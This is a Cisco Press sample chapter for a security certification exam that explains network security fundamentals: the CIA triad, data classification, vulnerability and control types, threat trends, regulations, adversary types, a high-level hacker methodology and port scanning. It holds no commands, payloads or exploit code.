Home > Articles > Cisco Certification > Network Security Concepts and Policies

Network Security Concepts and Policies

  • Sample Chapter is provided courtesy of Cisco Press.
  • Date: Feb 5, 2013.

Chapter Description

In this chapter, you learn how to develop a comprehensive network security policy to counter threats against information security. You also learn about possible threats and how to describe and implement the process of developing a security policy.

In this chapter, you learn about the following topics:

  • Fundamental concepts in network security, including identification of common vulnerabilities and threats, and mitigation strategies
  • Implementation of a security architecture using a lifecycle approach, including the phases of the process, their dependencies, and the importance of a sound security policy

The open nature of the Internet makes it vital for businesses to pay attention to the security of their networks. As companies move more of their business functions to the public network, they need to take precautions to ensure that the data cannot be compromised and that the data is not accessible to anyone who is not authorized to see it.

Unauthorized network access by an outside hacker or a disgruntled employee can cause damage or destruction to proprietary data, negatively affect company productivity, and impede the capability to compete. The Computer Security Institute reported in its 2010/2011 CSI Computer Crime and Security Survey (available at http://gocsi.com/survey) that on an average day, 41.1 percent of respondents dealt with at least one security incident (see page 11 of the survey). Unauthorized network access can also harm relationships with customers and business partners, who might question the capability of a company to protect its confidential information. The definition of “data location” is being blurred by cloud computing services and other service trends. Individuals and corporations benefit from the elastic deployment of services in the cloud, available at all times from any device, but these dramatic changes in the business services industry exacerbate the risks in protecting data and the entities using it (individuals, businesses, governments, and so on). Security policies and architectures require sound principles and a lifecycle approach, including whether the data is in the server farm, mobile on the employee’s laptop, or stored in the cloud.

To start on our network security quest, this chapter examines the need for security, looks at what you are trying to protect, and examines the different trends for attacks and protection and the principles of secure network design. These concepts are important not only for succeeding with the IINS 640-554 exam, but they are fundamentals at all security endeavors on which you will be embarking.

Building Blocks of Information Security

Establishing and maintaining a secure computing environment is increasingly more difficult as networks become increasingly interconnected and data flows ever more freely. In the commercial world, connectivity is no longer optional, and the possible risks of connectivity do not outweigh the benefits. Therefore, it is very important to enable networks to support security services that provide adequate protection to companies that conduct business in a relatively open environment. This section explains the breadth of assumptions and challenges to establish and maintain a secure network environment.

Basic Security Assumptions

Several new assumptions have to be made about computer networks because of their evolution over the years:

  • Modern networks are very large, very interconnected, and run both ubiquitous protocols (such as IP) and proprietary protocols. Therefore, they are often open to access, and a potential attacker can with relative ease attach to, or remotely access, such networks. Widespread IP internetworking increases the probability that more attacks will be carried out over large, heavily interconnected networks, such as the Internet.
  • Computer systems and applications that are attached to these networks are becoming increasingly complex. In terms of security, it becomes more difficult to analyze, secure, and properly test the security of the computer systems and applications; it is even more so when virtualization is involved. When these systems and their applications are attached to large networks, the risk to computing dramatically increases.

Basic Security Requirements

To provide adequate protection of network resources, the procedures and technologies that you deploy need to guarantee three things, sometimes referred to as the CIA triad:

  • Confidentiality: Providing confidentiality of data guarantees that only authorized users can view sensitive information.
  • Integrity: Providing integrity of data guarantees that only authorized users can change sensitive information and provides a way to detect whether data has been tampered with during transmission; this might also guarantee the authenticity of data.
  • Availability of systems and data: System and data availability provides uninterrupted access by authorized users to important computing resources and data.

When designing network security, a designer must be aware of the following:

  • The threats (possible attacks) that could compromise security
  • The associated risks of the threats (that is, how relevant those threats are for a particular system)
  • The cost to implement the proper security countermeasures for a threat
  • A cost versus benefit analysis to determine whether it is worthwhile to implement the security countermeasures

Data, Vulnerabilities, and Countermeasures

Although viruses, worms, and hackers monopolize the headlines about information security, risk management is the most important aspect of security architecture for administrators. A less exciting and glamorous area, risk management is based on specific principles and concepts that are related to asset protection and security management.

An asset is anything of value to an organization. By knowing which assets you are trying to protect, as well as their value, location, and exposure, you can more effectively determine the time, effort, and money to spend in securing those assets.

A vulnerability is a weakness in a system or its design that could be exploited by a threat. Vulnerabilities are sometimes found in the protocols themselves, as in the case of some security weaknesses in TCP/IP. Often, the vulnerabilities are in the operating systems and applications.

Written security policies might also be a source of vulnerabilities. This is the case when written policies are too lax or are not thorough enough in providing a specific approach or line of conduct to network administrators and users.

A threat is any potential danger to assets. A threat is realized when someone or something identifies a specific vulnerability and exploits it, creating exposure. If the vulnerability exists theoretically but has not yet been exploited, the threat is considered latent. The entity that takes advantage of the vulnerability is known as the threat agent or threat vector.

A risk is the likelihood that a particular threat using a specific attack will exploit a particular vulnerability of a system that results in an undesirable consequence. Although the roof of the data center might be vulnerable to being penetrated by a falling meteor, for example, the risk is minimal because the likelihood of that threat being realized is negligible.

An exploit happens when computer code is developed to take advantage of a vulnerability. For example, suppose that a vulnerability exists in a piece of software, but nobody knows about this vulnerability. Although the vulnerability exists theoretically, there is no exploit yet developed for it. Because there is no exploit, there really is no problem yet.

A countermeasure is a safeguard that mitigates a potential risk. A countermeasure mitigates risk either by eliminating or reducing the vulnerability or by reducing the likelihood that a threat agent will be able to exploit the risk.

Data Classification

To optimally allocate resources and secure assets, it is essential that some form of data classification exists. By identifying which data has the most worth, administrators can put their greatest effort toward securing that data. Without classification, data custodians find it almost impossible to adequately secure the data, and IT management finds it equally difficult to optimally allocate resources.

Sometimes information classification is a regulatory requirement (required by law), in which case there might be liability issues that relate to the proper care of data. By classifying data correctly, data custodians can apply the appropriate confidentiality, integrity, and availability controls to adequately secure the data, based on regulatory, liability, and ethical requirements. When an organization takes classification seriously, it illustrates to everyone that the company is taking information security seriously.

The methods and labels applied to data differ all around the world, but some patterns do emerge. The following is a common way to classify data that many government organizations, including the military, use:

  • Unclassified: Data that has little or no confidentiality, integrity, or availability requirements and therefore little effort is made to secure it.
  • Restricted: Data that if leaked could have undesirable effects on the organization. This classification is common among NATO (North Atlantic Treaty Organization) countries but is not used by all nations.
  • Confidential: Data that must comply with confidentiality requirements. This is the lowest level of classified data in this scheme.
  • Secret: Data for which you take significant effort to keep secure because its disclosure could lead to serious damage. The number of individuals who have access to this data is usually considerably fewer than the number of people who are authorized to access confidential data.
  • Top secret: Data for which you make great effort and sometimes incur considerable cost to guarantee its secrecy since its disclosure could lead to exceptionally grave damage. Usually a small number of individuals have access to top-secret data, on condition that there is a need to know.
  • Sensitive But Unclassified (SBU): A popular classification by government that designates data that could prove embarrassing if revealed, but no great security breach would occur. SBU is a broad category that also includes the For Official Use Only designation.

It is important to point out that there is no actual standard for private-sector classification. Furthermore, different countries tend to have different approaches and labels. Nevertheless, it can be instructive to examine a common, private sector classification scheme:

  • Public: Companies often display public data in marketing literature or on publicly accessible websites.
  • Sensitive: Data in this classification is similar to the SBU classification in the government model. Some embarrassment might occur if this data is revealed, but no serious security breach is involved.
  • Private: Private data is important to an organization. You make an effort to maintain the secrecy and accuracy of this data.
  • Confidential: Companies make the greatest effort to secure confidential data. Trade secrets and employee personnel files are examples of what a company would commonly classify as confidential.

    Regardless of the classification labeling used, what is certain is that as the security classification of a document increases, the number of staff that should have access to that document should decrease, as illustrated in Figure 1-1.

    Figure 1-1

    Figure 1-1. Ratio: Staff Access to Information Security Classification

    Many factors go into the decision of how to classify certain data. These factors include the following:

  • Value: Value is the number one criterion. Not all data has the same value. The home address and medical information of an employee is considerably more sensitive (valuable) than the name of the chief executive officer (CEO) and the main telephone number of the company.
  • Age: For many types of data, its importance changes with time. For example, an army general will go to great lengths to restrict access to military secrets. But after the war is over, the information is gradually less and less useful and eventually is declassified.
  • Useful life: Often data is valuable for only a set window of time, and after that window has expired, there is no need to keep it classified. An example of this type of data is confidential information about the products of a company. The useful life of the trade secrets of products typically expires when the company no longer sells the product.
  • Personal association: Data of this type usually involves something of a personal nature. Much of the government data regarding employees is of this nature. Steps are usually taken to protect this data until the person is deceased.

For a classification system to work, there must be different roles that are fulfilled. The most common of these roles are as follows:

  • Owner: The owner is the person who is ultimately responsible for the information, usually a senior-level manager who is in charge of a business unit. The owner classifies the data and usually selects custodians of the data and directs their actions. It is important that the owner periodically review the classified data because the owner is ultimately responsible for the data.
  • Custodian: The custodian is usually a member of the IT staff who has the day-to-day responsibility for data maintenance. Because the owner of the data is not required to have technical knowledge, the owner decides the security controls but the custodian marks the data to enforce these security controls. To maintain the availability of the data, the custodian regularly backs up the data and ensures that the backup media is secure. Custodians also periodically review the security settings of the data as part of their maintenance responsibilities.
  • User: Users bear no responsibility for the classification of data or even the maintenance of the classified data. However, users do bear responsibility for using the data in accordance with established operational procedures so that they maintain the security of the data while it is in their possession.

Vulnerabilities Classifications

It is also important to understand the weaknesses in security countermeasures and operational procedures. This understanding results in more effective security architectures. When analyzing system vulnerabilities, it helps to categorize them in classes to better understand the reasons for their emergence. You can classify the main vulnerabilities of systems and assets using broad categories:

  • Policy flaws
  • Design errors
  • Protocol weaknesses
  • Software vulnerabilities
  • Misconfiguration
  • Hostile code
  • Human factor

This list mentions just a few of the vulnerability categories. For each of these categories, multiple vulnerabilities could be listed.

There are several industry efforts that are aimed at categorizing threats for the public domain. These are some well-known, publicly available catalogs that may be used as templates for vulnerability analysis:

  • Common Vulnerabilities and Exposures (CVE): A dictionary of publicly known information security vulnerabilities and exposures. It can be found at http://cve.mitre.org/. The database provides common identifiers that enable data exchange between security products, providing a baseline index point for evaluating coverage of tools and services.
  • National Vulnerability Database (NVD): The U.S. government repository of standards-based vulnerability management data. This data enables automation of vulnerability management, security measurement, and compliance. NVD includes databases of security checklists, security-related software flaws, misconfigurations, product names, and impact metrics. The database can be found at http://nvd.nist.gov.
  • Common Vulnerability Scoring System (CVSS): A standard within the computer and networking fields for assessing and classifying security vulnerabilities. This standard is focused on rating a vulnerability compared to others, thus helping the administrator to set priorities. This standard was adopted by significant players in the industry such as McAfee, Qualys, Tenable, and Cisco. More information can be found, including the database and calculator, at http://www.first.org/cvss.

Countermeasures Classification

After assets (data) and vulnerabilities, threats are the most important component to understand. Threat classification and analysis, as part of the risk management architecture, will be described later in this chapter.

Once threat vectors are considered, organizations rely on various controls to accomplish in-depth defense as part of their security architecture. There are several ways to classify these security controls; one of them is based on the nature of the control itself. These controls fall into one of three categories:

  • Administrative: Controls that are largely policies and procedures
  • Technical: Controls that involve electronics, hardware, software, and so on
  • Physical: Controls that are mostly mechanical

Later in this chapter, we will discuss models and frameworks from different organizations that can be used to implement network security best practices.

Administrative Controls

Administrative controls are largely policy and procedure driven. You will find many of the administrative controls that help with an enterprise’s information security in the human resources department. Some of these controls are as follows:

  • Security-awareness training
  • Security policies and standards
  • Change controls and configuration controls
  • Security audits and tests
  • Good hiring practices
  • Background checks of contractors and employees

For example, if an organization has strict hiring practices that require drug testing and background checks for all employees, the organization will likely hire fewer individuals of questionable character. With fewer people of questionable character working for the company, it is likely that there will be fewer problems with internal security issues. These controls do not single-handedly secure an enterprise, but they are an important part of an information security program.

Technical Controls

Technical controls are extremely important to a good information security program, and proper configuration and maintenance of these controls will significantly improve information security. The following are examples of technical controls:

  • Firewalls
  • Intrusion prevention systems (IPS)
  • Virtual private network (VPN) concentrators and clients
  • TACACS+ and RADIUS servers
  • One-time password (OTP) solutions
  • Smart cards
  • Biometric authentication devices
  • Network Admission Control (NAC) systems
  • Routers with ACLs
Physical Controls

While trying to secure an environment with good technical and administrative controls, it is also necessary that you lock the doors in the data center. This is an example of a physical control. Other examples of physical controls include the following:

  • Intruder detection systems
  • Security guards
  • Locks
  • Safes
  • Racks
  • Uninterruptible power supplies (UPS)
  • Fire-suppression systems
  • Positive air-flow systems

When security professionals examine physical security requirements, life safety (protecting human life) should be their number one concern. Good planning is needed to balance life safety concerns against security concerns. For example, permanently barring a door to prevent unauthorized physical access might prevent individuals from escaping in the event of a fire. By the way, physical security is a field that Cisco entered a few years ago. More information on those products can be found at http://www.cisco.com/go/physicalsecurity.

Controls are also categorized by the type of control they are:

  • Preventive: The control prevents access.
  • Deterrent: The control deters access.
  • Detective: The control detects access.

All three categories of controls can be any one of the three types of controls; for example, a preventive control can be administrative, physical, or technical.

Preventive controls exist to prevent compromise. This statement is true whether the control is administrative, technical, or physical. The ultimate purpose for these controls is to stop security breaches before they happen.

However, a good security design also prepares for failure, recognizing that prevention will not always work. Therefore, detective controls are also part of a comprehensive security program because they enable you to detect a security breach and to determine how the network was breached. With this knowledge, you should be able to better secure the data the next time.

With effective detective controls in place, the incident response can use the detective controls to figure out what went wrong, allowing you to immediately make changes to policies to eliminate a repeat of that same breach. Without detective controls, it is extremely difficult to determine what you need to change.

Deterrent controls are designed to scare away a certain percentage of adversaries to reduce the number of incidents. Cameras in bank lobbies are a good example of a deterrent control. The cameras most likely deter at least some potential bank robbers. The cameras also act as a detective control.

Need for Network Security

Business goals and risk analysis drive the need for network security. For a while, information security was influenced to some extent by fear, uncertainty, and doubt. Examples of these influences included the fear of a new worm outbreak, the uncertainty of providing web services, or doubts that a particular leading-edge security technology would fail. But we realized that regardless of the security implications, business needs had to come first.

If your business cannot function because of security concerns, you have a problem. The security system design must accommodate the goals of the business, not hinder them. Therefore, risk management involves answering two key questions:

  • What does the cost-benefit analysis of your security system tell you?
  • How will the latest attack techniques play out in your network environment?

    Figure 1-2 illustrates the key factors you should consider when designing a secure network:

  • Business needs: What does your organization want to do with the network?
  • Risk analysis: What is the risk and cost balance?
  • Security policy: What are the policies, standards, and guidelines that you need to address business needs and risks?
  • Industry best practices: What are the reliable, well-understood, and recommended security best practices?
  • Security operations: These operations include incident response, monitoring, maintenance, and auditing the system for compliance.

    Figure 1-2

    Figure 1-2. Factors Affecting the Design of a Secure Network

Risk management and security policies will be detailed later in this chapter.

Intent Evolution

When viewed from the perspective of motivation intersecting with opportunity, risk management can be driven not only by the techniques or sophistication of the attackers and threat vectors, but also by their motives. Research reveals that hackers are increasingly motivated by profit, where in the past they were motivated by notoriety and fame. In instances of attacks carried out for financial gains, hackers are not looking for attention, which makes their exploits harder to detect. Few signatures exist or will ever be written to capture these “custom” threats. In order to be successful in defending your environments, you must employ a new model to catch threats across the infrastructure.

Attackers are also motivated by government or industrial espionage. The Stuxnet worm, whose earliest versions appear to date to 2009, is an example. This worm differs from its malware “cousins” in that it has a specific, damaging goal: to traverse industrial control systems, such as supervisory control and data acquisition (SCADA) systems, so that it can reprogram the programmable logic controllers, possibly disrupting industrial operations.

This worm was not created to gather credit card numbers to sell off to the highest bidder, or to sell fake pharmaceuticals. This worm appears to have been created solely to invade public or private infrastructure. The cleverness of Stuxnet lies in its ability to traverse non-networked systems, which means that even systems unconnected to networks or the Internet are at risk.

Security experts have called Stuxnet “the smartest malware ever.” This worm breaks the malware mold because it is designed to disrupt industrial control systems in critical infrastructure. This ability should be a concern for every government.

Motivation can also so be political or in the form of vigilantism. Anonymous is currently the best known hacktivist group. As a recent example of its activities, in May 2012, Anonymous attacked the website of the Quebec government after its promulgation of a law imposing new requirements for the right to protest by college and university students.

Threat Evolution

The nature and sophistication of threats, as well as their pervasiveness and global nature, are trends to watch.Figure 1-3 shows how the threats that organizations face have evolved over the past few decades, and how the growth rate of vulnerabilities that are reported in operating systems and applications is rising. The number and variety of viruses and worms that have appeared over the past three years is daunting, and their rate of propagation is frightening. There have been unacceptable levels of business outages and expensive remediation projects that consume staff, time, and funds that were not originally budgeted for such tasks.

Figure 1-3

Figure 1-3. Shrinking Time Frame from Knowledge of Vulnerability to Release of Exploits

New exploits are designed to have global impact in minutes. Blended threats, which use multiple means of propagation, are more sophisticated than ever. The trends are becoming regional and global in nature. Early attacks affected single systems or one organization network, while attacks that are more recent are affecting entire regions. For example, attacks have expanded from individual denial of service (DoS) attacks from a single attacker against a single target, to large-scale distributed DoS (DDoS) attacks emanating from networks of compromised systems that are known as botnets.

Threats are also becoming persistent. After an attack starts, attacks may appear in waves as infected systems join the network. Because infections are so complex and have so many end users (employees, vendors, and contractors), multiple types of endpoints (company desktop, home, and server), and multiple types of access (wired, wireless, VPN, and dial-up), infections are difficult to eradicate.

More recent threat vectors are increasingly sophisticated, and the motivation of the attackers is reflected in their impact. Recent threat vectors include the following:

  • Cognitive threats via social networks (likejacking): Social engineering takes a new meaning in the era of social networking. From phishing attacks that target social network accounts of high-profile individuals, to information exposure due to lack of policy, social networks have become a target of choice for malicious attackers.
  • PDA and consumer electronics exploits: The operating systems on consumer devices (smartphones, PDAs, and so on) are an option of choice for high-volume attacks. The proliferation of applications for these operating systems, and the nature of the development and certification processes for those applications, augments the problem.
  • Widespread website compromises: Malicious attackers compromise popular websites, making the sites download malware to connecting users. Attackers typically are not interested in the data on the website, but use it as a springboard to infect the users of the site.
  • Disruption of critical infrastructure: The Stuxnet malware, which exploits holes in Windows systems and targets a specific Siemens supervisory control and data acquisition (SCADA) program with sabotage, confirmed concerns about an increase in targeted attacks aimed at the power grid, nuclear plants, and other critical infrastructure.
  • Virtualization exploits: Device and service virtualization add more complexity to the network. Attackers know this and are increasingly targeting virtual servers, virtual switches, and trust relationships at the hypervisor level.
  • Memory scraping: Increasingly popular, this technique is aimed at fetching information directly from volatile memory. The attack tries to exploit operating systems and applications that leave traces of data in memory. Attacks are particularly aimed at encrypted information that may be processed as unencrypted in volatile memory.
  • Hardware hacking: These attacks are aimed at exploiting the hardware architecture of specific devices, with consumer devices being increasingly popular. Attack methods include bus sniffing, altering firmware, and memory dumping to find crypto keys.
  • IPv6-based attacks: These attacks could become more pervasive as the migration to IPv6 becomes widespread. Attackers are focusing initially on covert channels through various tunneling techniques, and man-in-the middle attacks leverage IPv6 to exploit IPv4 in dual-stack deployments.

Trends Affecting Network Security

Other trends in business, technology, and innovation influence the need for new paradigms in information security. Mobility is one trend. Expect to see billions of new network mobile devices moving into the enterprise worldwide over the next few years. Taking into consideration constant reductions and streamlining in IT budgets, organizations face serious challenges in supporting a growing number of mobile devices at a time when their resources are being reduced.

The second market transition is cloud computing and cloud services. Organizations of all kinds are taking advantage of offerings such as Software as a Service (SaaS) and Infrastructure as a Service (IaaS) to reduce costs and simplify the deployment of new services and applications.

These cloud services add challenges in visibility (how do you identify and mitigate threats that come to and from a trusted network?), control (who controls the physical assets, encryption keys, and so on?), and trust (do you trust cloud partners to ensure that critical application data is still protected when it is off the enterprise network?).

The third market transition is about changes to the workplace experience. Borders are blurring in the organization between consumers and workers and between the various functions within the organization. The borders between the company and its partners, customers, and suppliers, are also fading. As a result, the network is experiencing increasing demand to connect anyone, any device, anywhere, at any time.

These changes represent a challenge to security teams within the organization. These teams now need to manage noncontrolled consumer devices, such as a personal tablet, coming into the network, and provide seamless and context-aware services to users all over the world. The location of the data and services accessed by the users is almost irrelevant. The data could be internal to the organization or it could be in the cloud. This situation makes protecting data and services a challenging proposition.

Attacks are increasingly politically and financially motivated, driven by botnets, and aimed at critical infrastructure; for example:

One of the trends in threats is the exploitation of trust. Whether they are creating malware that can subvert industrial processes or tricking social network users into handing over login and password information, cybercriminals have a powerful weapon at their disposal: the exploitation of trust. Cybercriminals have become skilled at convincing users that their infected links and URLs are safe to click, and that they are someone the user knows and trusts. Hackers exploit the trust we have in TinyURLs and in security warning banners. With stolen security credentials, cybercriminals can freely interact with legitimate software and systems.

Nowhere is this tactic more widespread than within social networking, where cybercriminals continue to attract victims who are willing to share information with people they believe are known to them, with malware such as Koobface. One noticeable shift in social engineering is that criminals are spending more time figuring out how to assume someone’s identity, perhaps by generating emails from an individual’s computer or social networking account. A malware-laden email or scam sent by a “trusted person” is more likely to elicit a click-through response than the same message sent by a stranger.

Threats originating from countries outside of the United States are rapidly increasing. Global annual spam volumes actually dropped in 2010, the first time this has happened in the history of the Internet. However, spammers are originating in increasingly varied locations and countries.

Money muling is the practice of hiring individuals as “mules,” recruited by handlers or “wranglers” to set up bank accounts, or even use their own bank accounts, to assist in the transfer of money from the account of a fraud victim to another location, usually overseas, via a wire transfer or automated clearing house (ACH) transaction. Money mule operations often involve individuals in multiple countries.

Web malware is definitely on the rise. The number of distinct domains that are compromised to download malware to connecting users is increasing dramatically. The most dangerous aspect of this type of attack is the fact that users do not need to do much to get infected. Many times, the combination of malware on the website and vulnerabilities on web browsers is enough to provoke infection just by connecting to the website. The more popular the site, the higher the volume of potential infection.

Recently there have been major shifts in the compliance landscape. Although enforcement of existing regulations has been weak in many jurisdictions worldwide, regulators and standards bodies are now tightening enforcement through expanded powers, higher penalties, and harsh enforcement actions. In the future it will be more difficult to hide failures in information security wherever organizations do business. Legislators are forcing transparency through the introduction of breach notification laws in Europe, Asia, and North America as data breach disclosure becomes a global principle.

As more regulations are introduced, there is a trend toward increasingly prescriptive rules. For example, recent amendments introduced in the United Kingdom in 2011 bring arguably more prescriptive information protection regulations to the Privacy and Electronic Communications Directive. Such laws are discussed in more detailed later in this chapter. Any global enterprise that does business in the United Kingdom today will likely be covered by these regulations. Lately, regulators are also making it clear that enterprises are responsible for ensuring the protection of their data when it is being processed by a business partner, including cloud service providers. The new era of compliance creates formidable challenges for organizations worldwide.

For many organizations, stricter compliance could help focus management attention on security, but if managers take a “check-list approach” to compliance, it will detract from actually managing risk and may not improve security. The new compliance landscape will increase costs and risks. For example, it takes time and resources to substantiate compliance. Increased requirements for service providers give rise to more third-party risks.

With more transparency, there are now greater consequences for data breaches. For example, expect to see more litigation as customers and business partners seek compensation for compromised data. But the harshest judgments will likely come from the court of public opinion, with the potential to permanently damage an enterprise’s reputation.

The following are some of the U.S. and international regulations that many companies are subject to:

  • Sarbanes-Oxley (SOX)
  • Federal Information Security Management Act (FISMA)
  • Gramm-Leach-Bliley Act (GLBA)
  • Payment Card Industry Data Security Standard (PCI DSS)
  • Health Insurance Portability and Accountability Act (HIPAA)
  • Digital Millennium Copyright Act (DMCA)
  • Personal Information Protection and Electronic Documents Act (PIPEDA) in Canada
  • European Union Data Protection Directive (EU 95/46/EC)
  • Safe Harbor Act - European Union and United States
  • International Convergence of Capital Measurement and Capital Standards (Basel II)

The challenge becomes to comply with these regulations and, at the same time, make that compliance translate into an effective security posture.

Adversaries, Methodologies, and Classes of Attack

Who are hackers? What motivates them? How do they conduct their attacks? How do they manage to breach the measures we have in place to ensure confidentiality, integrity, and availability? Which best practices can we adopt to defeat hackers? These are some of the questions we try to answer in this section.

People are social beings, and it is quite common for systems to be compromised through social engineering. Harm can be caused by people just trying to be “helpful.” For example, in an attempt to be helpful, people have been known to give their passwords over the phone to attackers who have a convincing manner and say they are troubleshooting a problem and need to test access using a real user password. End users must be trained, and reminded, that the ultimate security of a system depends on their behavior.

Of course, people often cause harm within organizations intentionally: most security incidents are caused by insiders. Thus, strong internal controls on security are required, and special organizational practices might need to be implemented.

An example of a special organizational practice that helps to provide security is the separation of duty, where critical tasks require two or more persons to complete them, thereby reducing the risk of insider threat. People are less likely to attack or misbehave if they are required to cooperate with others.

Unfortunately, users frequently consider security too difficult to understand. Software often does not make security options or decisions easy for end users. Also, users typically prefer “whatever” functionality to no functionality. Implementation of security measures should not create an internally generated DoS, meaning, if security is too stringent or too cumbersome for users, either they will not have access to all the resources needed to perform their work or their performance will be hindered by the security operations.

Adversaries

To defend against attacks on information and information systems, organizations must begin to define the threat by identifying potential adversaries. These adversaries can include the following:

  • Nations or states
  • Terrorists
  • Criminals
  • Hackers
  • Corporate competitors
  • Disgruntled employees
  • Government agencies, such as the National Security Agency (NSA) and the Federal Bureau of Investigations (FBI)

Hackers comprise the most well-known outside threat to information systems. They are not necessarily geniuses, but they are persistent people who have taken a lot of time to learn their craft.

Many titles are assigned to hackers:

  • Hackers: Hackers are computer enthusiasts who break into networks and systems to learn more about them. Some hackers generally mean no harm and do not expect financial gain. Unfortunately, hackers may unintentionally pass valuable information on to people who do intend to harm the system. Hackers are subdivided into the following categories:
    • White hat (ethical hacker)
    • Blue hat (bug tester)
    • Gray hat (ethically questionable hacker)
    • Black hat (unethical hacker)
  • Crackers (criminal hackers): Crackers are hackers with a criminal intent to harm information systems. Crackers are generally working for financial gain and are sometimes called black hat hackers.
  • Phreakers (phone breakers): Phreakers pride themselves on compromising telephone systems. Phreakers reroute and disconnect telephone lines, sell wiretaps, and steal long-distance services.

  • Script kiddies: Script kiddies think of themselves as hackers, but have very low skill levels. They do not write their own code; instead, they run scripts written by other, more skilled attackers.

  • Hacktivists: Hacktivists are individuals who have a political agenda in doing their work. When government websites are defaced, this is usually the work of a hacktivist.

Methodologies

The goal of any hacker is to compromise the intended target or application. Hackers begin with little or no information about the intended target, but by the end of their analysis, they have accessed the network and have begun to compromise their target. Their approach is usually careful and methodical, not rushed and reckless. The seven-step process that follows is a good representation of the methods that hackers use:

  • Step 1. Perform footprint analysis (reconnaissance).
  • Step 2. Enumerate applications and operating systems.
  • Step 3. Manipulate users to gain access.
  • Step 4. Escalate privileges.
  • Step 5. Gather additional passwords and secrets.
  • Step 6. Install back doors.
  • Step 7. Leverage the compromised system.

To successfully hack into a system, hackers generally first want to know as much as they can about the system. Hackers can build a complete profile, or “footprint,” of the company security posture. Using a range of tools and techniques, an attacker can discover the company domain names, network blocks, IP addresses of systems, ports and services that are used, and many other details that pertain to the company security posture as it relates to the Internet, an intranet, remote access, and an extranet. By following some simple advice, network administrators can make footprinting more difficult.

After hackers have completed a profile, or footprint, of your organization, they use tools such as those in the list that follows to enumerate additional information about your systems and networks. All these tools are readily available to download, and the security staff should know how these tools work. Additional tools (introduced later in the “Security Testing Techniques” section) can also be used to gather information and therefore hack.

  • Netcat: Netcat is a featured networking utility that reads and writes data across network connections.
  • Microsoft EPDump and Microsoft Remote Procedure Call (RPC) Dump: These tools provide information about Microsoft RPC services on a server.
  • GetMAC: This application provides a quick way to find the MAC (Ethernet) layer address and binding order for a computer running Microsoft Windows locally or across a network.
  • Software development kits (SDK): SDKs provide hackers with the basic tools that they need to learn more about systems.

Another common technique that hackers use is to manipulate users of an organization to gain access to that organization. There are countless cases of unsuspecting employees providing information to unauthorized people simply because the requesters appear innocent or to be in a position of authority. Hackers find names and telephone numbers on websites or domain registration records by footprinting. Hackers then directly contact these people by phone and convince them to reveal passwords. Hackers gather information without raising any concern or suspicion. This form of attack is called social engineering. One form of a social engineering attack is for the hacker to pose as a visitor to the company, a delivery person, a service technician, or some other person who might have a legitimate reason to be on the premises and, after gaining entrance, walk by cubicles and look under keyboards to see whether anyone has put a note there containing the current password.

The next thing the hacker typically does is review all the information that they have collected about the host, searching for usernames, passwords, and Registry keys that contain application or user passwords. This information can help hackers escalate their privileges on the host or network. If reviewing the information from the host does not reveal useful information, hackers may launch a Trojan horse attack in an attempt to escalate their privileges on the host. This type of attack usually means copying malicious code to the user system and giving it the same name as a frequently used piece of software.

After the hacker has obtained higher privileges, the next task is to gather additional passwords and other sensitive data. The targets now include such things as the local security accounts manager database or the Active Directory of a domain controller. Hackers use legitimate tools such as pwdump and lsadump applications to gather passwords from machines running Windows, which then can be cracked with the very popular Cain & Abel software tool. By cross-referencing username and password combinations, the hacker is able to obtain administrative access to all the computers in the network.

If hackers are detected trying to enter through the “front door,” or if they want to enter the system without being detected, they try to use “back doors” into the system. A back door is a method of bypassing normal authentication to secure remote access to a computer while attempting to remain undetected. The most common backdoor point is a listening port that provides remote access to the system for users (hackers) who do not have, or do not want to use, access or administrative privileges.

After hackers gain administrative access, they enjoy hacking other systems on the network. As each new system is hacked, the attacker performs the steps that were outlined previously to gather additional system and password information. Hackers try to scan and exploit a single system or a whole set of networks and usually automate the whole process.

In addition, hackers will cover their tracks either by deleting log entries or falsifying them.

Threats Classification

In classifying security threats, it is common to find general categories that resemble the perspective of the attacker and the approaches that are used to exploit software. Attack patterns are a powerful mechanism to capture and communicate the perspective of the attacker. These patterns are descriptions of common methods for exploiting vulnerabilities. The patterns derive from the concept of design patterns that are applied in a destructive rather than constructive context and are generated from in-depth analysis of specific, real-world exploit examples. The following list illustrates examples of threat categories that are based on this criterion. Notice that some threats are not malicious attacks. Examples of nonmalicious threats include forces of nature such as hurricanes and earthquakes.

Later in this chapter, you learn about some of the general categories under which threats can be regrouped, such as:

  • Enumeration and fingerprinting
  • Spoofing and impersonation
  • Man-in-the-middle
  • Overt and covert channels
  • Blended threats and malware
  • Exploitation of privilege and trust
  • Confidentiality
  • Password attacks
  • Availability attacks
    • Denial of service (DoS)
    • Botnet
  • Physical security attacks
  • Forces of nature

To assist in enhancing security throughout the security lifecycle, there are many publicly available classification databases that provide a catalog of attack patterns and classification taxonomies. They are aimed at providing a consistent view and method for identifying, collecting, refining, and sharing attack patterns for specific communities of interest. The following are four of the most prominent databases:

  • Common Attack Pattern Enumeration and Classification (CAPEC): Sponsored by the U.S. Department of Homeland Security as part of the software assurance strategic initiative of the National Cyber Security Division, the objective of this effort is to provide a publicly available catalog of attack patterns along with a comprehensive schema and classification taxonomy. More information can be found at http://capec.mitre.org.
  • Open Web Application Security Project (OWASP) Application Security Verification Standard (ASVS): OWASP is a not-for-profit worldwide charitable organization focused on improving the security of application software. The primary objective of ASVS is to normalize the range in the coverage and level of rigor available in the market when it comes to performing web application security verification using a commercially workable open standard. More information can be found at https://www.owasp.org.
  • Web Application Security Consortium Threat Classification (WASC TC): Sponsored by the WASC, this is a cooperative effort to clarify and organize the threats to the security of a website. The project is aimed at developing and promoting industry-standard terminology for describing these issues. Application developers, security professionals, software vendors, and compliance auditors have the ability to access a consistent language and definitions for web security-related issues. More information can be found at http://www.webappsec.org.
  • Malware Attribute Enumeration and Characterization (MAEC): Created by MITRE, this effort is international in scope and free for public use. MAEC is a standardized language for encoding and communicating high-fidelity information about malware based on attributes such as behaviors, artifacts, and attack patterns. More information can be found at http://maec.mitre.org.
Enumeration and Fingerprinting with Ping Sweeps and Port Scans

Enumeration and fingerprinting are types of attacks that use legitimate tools for illegitimate purposes. Some of the tools, such as port-scan and ping-sweep applications, run a series of tests against hosts and devices to identify vulnerable services that need attention. IP addresses and port or banner data from both TCP and UDP ports are examined to gather information.

In an illegitimate situation, a port scan is a series of messages sent by someone attempting to break into a computer to learn which computer network services (each service is associated with a well-known port number) the computer provides. Port scanning can be automated to scan a range of TCP or UDP port numbers on a host to detect listening services. Port scanning, a favorite computer hacker approach, provides information to the hacker about where to probe for weaknesses. Essentially, a port scan consists of sending a message to each port, one at a time. The kind of response received indicates whether the port is being used and needs further probing.

